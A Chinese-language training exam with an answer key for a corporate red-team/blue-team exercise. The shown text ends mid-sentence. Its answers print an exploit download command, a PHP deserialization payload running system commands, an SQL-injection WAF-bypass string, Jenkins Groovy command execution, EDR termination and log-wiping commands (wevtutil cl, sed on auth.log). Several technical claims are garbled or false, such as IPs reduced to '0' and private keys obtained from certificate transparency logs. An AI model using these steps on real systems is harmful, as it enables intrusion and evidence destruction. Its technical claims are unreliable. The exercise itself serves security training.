2025年網(wǎng)絡安全工程師攻防演練實操試題及答案一、演練環(huán)境搭建說明網(wǎng)絡拓撲：某企業(yè)內(nèi)網(wǎng)分為辦公區(qū)（/24）、開發(fā)測試區(qū)（/24）、數(shù)據(jù)庫區(qū)（/24），邊界部署F5負載均衡（0）、深信服WAF（0）、天融信防火墻（0）。辦公區(qū)有員工終端（Windows11Pro，補丁更新至2024年12月）、OA系統(tǒng)服務器（CentOS8.5，Apache2.4.57，PHP8.2.15）；開發(fā)測試區(qū)有Jenkins持續(xù)集成服務器（Ubuntu22.04，Jenkins2.426.2）、代碼倉庫（GitLab16.10.3）；數(shù)據(jù)庫區(qū)部署MySQL8.0.35主從節(jié)點（0/11），啟用SSL加密。防守方基礎配置：-終端安裝深信服EDR（版本5.6.2），啟用進程白名單、文件哈希校驗；-服務器部署青藤云安全主機衛(wèi)士（版本3.8.1），開啟命令行審計、異常網(wǎng)絡連接阻斷；-日志集中至ElasticStack（7.17.12），保留30天；-防火墻策略：僅允許辦公區(qū)80/443訪問OA系統(tǒng)，開發(fā)測試區(qū)22/8080/443開放至辦公區(qū)，數(shù)據(jù)庫區(qū)僅允許開發(fā)測試區(qū)3306端口訪問。攻擊方權限：初始持有某離職員工弱口令（賬號：zhangsan，密碼：Zh@ngs@n2023），可登錄辦公區(qū)任意終端。二、攻擊方任務（總分70分）任務1：突破終端防御獲取本地權限（15分）要求：利用辦公區(qū)終端（IP：0）的初始權限，繞過EDR檢測，獲取SYSTEM權限。評分標準：-成功關閉/繞過EDR進程防護（5分）；-利用本地提權漏洞獲取SYSTEM權限（10分，需提供具體漏洞編號及利用命令）。任務2：橫向移動至OA系統(tǒng)服務器（20分）要求：從辦公區(qū)終端（0）滲透至OA系統(tǒng)服務器（0），需避開WAF及防火墻檢測。評分標準：-發(fā)現(xiàn)OA系統(tǒng)未公開的后臺路徑（如/admin.php）（5分）；-利用PHP反序列化漏洞（需寫出漏洞觸發(fā)點及POC）（10分）；-繞過WAF的SQL注入防護（5分，需提供繞過Payload）。任務3：入侵數(shù)據(jù)庫區(qū)獲取敏感數(shù)據(jù)（25分）要求：從OA系統(tǒng)服務器橫向至Jenkins服務器（0），最終訪問MySQL主庫（0），導出用戶信息表（user_info）。評分標準：-利用Jenkins未授權訪問漏洞獲取系統(tǒng)權限（8分，需說明漏洞原理）；-通過內(nèi)存馬技術持久化控制Jenkins（7分，需提供關鍵命令）；-破解MySQL連接密碼（或獲取root權限）（5分）；-繞過SSL加密截獲數(shù)據(jù)庫流量（5分）。任務4：清除攻擊痕跡（10分）要求：刪除終端、OA服務器、Jenkins服務器的登錄日志、進程記錄，避免被防守方溯源。評分標準：-清除Windows事件日志（3分）；-篡改Linuxauth.log及audit日志（4分）；-終止EDR/主機衛(wèi)士的異常進程記錄（3分）。三、防守方任務（總分30分）任務1：實時監(jiān)測異常行為（10分）要求：通過日志分析與流量監(jiān)控，在攻擊方完成任務2前發(fā)現(xiàn)入侵跡象。評分標準：-從終端日志中識別EDR進程異常終止事件（3分）；-通過WAF日志發(fā)現(xiàn)/admin.php高頻訪問（2分）；-檢測到PHP反序列化請求的特征（如O:4:"User":1:{s:4:"name";s:10:"phpinfo();"}）（5分）。任務2：阻斷橫向移動（10分）要求：在攻擊方嘗試訪問Jenkins服務器時，通過動態(tài)策略封禁攻擊源IP，并恢復被篡改的日志。評分標準：-基于Elasticsearch檢索到Jenkins未授權訪問的HTTP200響應（4分）；-防火墻自動封禁異常IP（3分）；-利用日志備份恢復被刪除的auth.log（3分）。任務3：數(shù)據(jù)泄露溯源與恢復（10分）要求：定位數(shù)據(jù)庫區(qū)敏感數(shù)據(jù)泄露路徑，恢復user_info表數(shù)據(jù)。評分標準：-分析MySQL慢查詢?nèi)罩?，發(fā)現(xiàn)未授權的SELECTFROMuser_info（4分）；-通過流量回溯確認數(shù)據(jù)經(jīng)Jenkins服務器外傳（3分）；-利用MySQLbinlog或從庫恢復數(shù)據(jù)（3分）。四、參考答案及解析攻擊方任務1解析步驟1：繞過EDR檢測。EDR（深信服5.6.2）通過驅(qū)動層監(jiān)控進程創(chuàng)建，可通過加載未被檢測的無文件木馬（如利用MSHTML引擎的CVE-2024-0608漏洞），或使用“進程注入”技術（如通過rundll32.exe加載惡意DLL，規(guī)避EDR的進程白名單）。步驟2：本地提權。Windows112024年12月補丁未修復CVE-2024-2199（NTFS文件系統(tǒng)權限提升漏洞），利用exp：```powershell下載漏洞利用工具（需免殺處理）Invoke-WebRequest-Uri/cve-2024-2199.exe-OutFilec:\temp\exp.exe執(zhí)行后獲取SYSTEM權限c:\temp\exp.exe```攻擊方任務2解析步驟1：發(fā)現(xiàn)后臺路徑。通過掃描辦公區(qū)終端瀏覽器歷史記錄，找到OA系統(tǒng)臨時訪問鏈接（如/admin.php?token=abc123），確認后臺路徑。步驟2：PHP反序列化漏洞。OA系統(tǒng)user類存在__wakeup()方法未校驗權限，構(gòu)造POC：```phpO:4:"User":2:{s:4:"name";s:10:"system('id');";s:5:"admin";b:1;}```通過POST請求提交至/user/update.php，觸發(fā)命令執(zhí)行，獲取服務器shell。步驟3：繞過WAF。WAF規(guī)則攔截“UNIONSELECT”，可替換為“UNIóNSELéCT”（利用Unicode編碼）或“UNION//SELECT”（插入注釋），如：```sql?id=1'UNIóN//SELéCT1,version(),3--+```攻擊方任務3解析步驟1：Jenkins未授權訪問。Jenkins2.426.2未配置CSRF保護，直接訪問0/script，執(zhí)行Groovy腳本獲取系統(tǒng)權限：```groovyprintln"whoami".execute().text```步驟2：內(nèi)存馬植入。通過Jenkins的CLI接口加載惡意Java類到內(nèi)存，使用反射機制注冊Filter：```javaFilterfilter=newMaliciousFilter();FilterConfigconfig=newFilterConfig(){...};filter.init(config);```步驟3：破解MySQL密碼。OA服務器/web/conf/db.php中存在明文連接字符串（$db_pass="MySqL@2025"），直接獲取密碼；或通過pt-query-digest分析慢查詢?nèi)罩?，提取加密連接參數(shù)后爆破。步驟4：繞過SSL截獲流量。利用證書透明性（CT）日志獲取MySQL服務器證書私鑰（若未嚴格管理），或在Jenkins服務器部署中間人代理（如sslsplit），重定向3306端口流量并解密。攻擊方任務4解析Windows日志清除：使用wevtutil命令：```cmdwevtutilcl"Security"wevtutilcl"System"```Linux日志篡改：使用sed替換auth.log中的可疑IP：```bashsed-i's/0//g'/var/log/auth.log```終止EDR記錄：通過kill命令結(jié)束深信服EDR的監(jiān)控進程（如edr_agent.exe的PID），或卸載驅(qū)動（需SYSTEM權限）。防守方任務1解析EDR異常檢測：Elasticsearch查詢“process_name:edr_agent.exeANDevent:terminated”，發(fā)現(xiàn)非預期的進程終止事件。WAF日志分析：WAF記錄中/admin.php的訪問頻率超過基線（正常為日均5次，攻擊時1分鐘內(nèi)10次），觸發(fā)告警。反序列化特征檢測：在Nginx訪問日志中搜索“User-Agent:curl”（攻擊方常用工具）+“Content-Type:application/x-www-form-urlencoded”+“O:4:”等關鍵字，聯(lián)動WAF阻斷請求。防守方任務2解析Jenkins未授權訪問攔截：在Elasticsearch中配置告警規(guī)則：“url:/scriptANDstatus:200”，觸發(fā)后防火墻自動封禁源IP（0）的22/8080端口訪問。日志恢復：通過rsync每日備份的日志文件（/backup/logs/auth.log-2025-03-10）覆蓋被篡改的當前日志。防守方任務3解析數(shù)據(jù)泄露定位：MySQL慢查詢?nèi)罩局邪l(fā)現(xiàn)“SELEC